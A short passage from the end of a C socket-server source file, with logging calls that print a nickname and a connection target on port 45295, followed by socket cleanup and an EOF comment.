%d.%d.%d.%d:45295.\n", inet_ntoa(saddr_in2.sin_addr), nick, ip1, ip2, ip3, ip4); fprintf(stderr, "[%s] Connecting to %d.%d.%d.%d:45295.\n", inet_ntoa(saddr_in2.sin_addr), ip1, ip2, ip3, ip4); } close(sock_server_new); exit(0); } close(sock_server_new); } return 0; } /* EOF */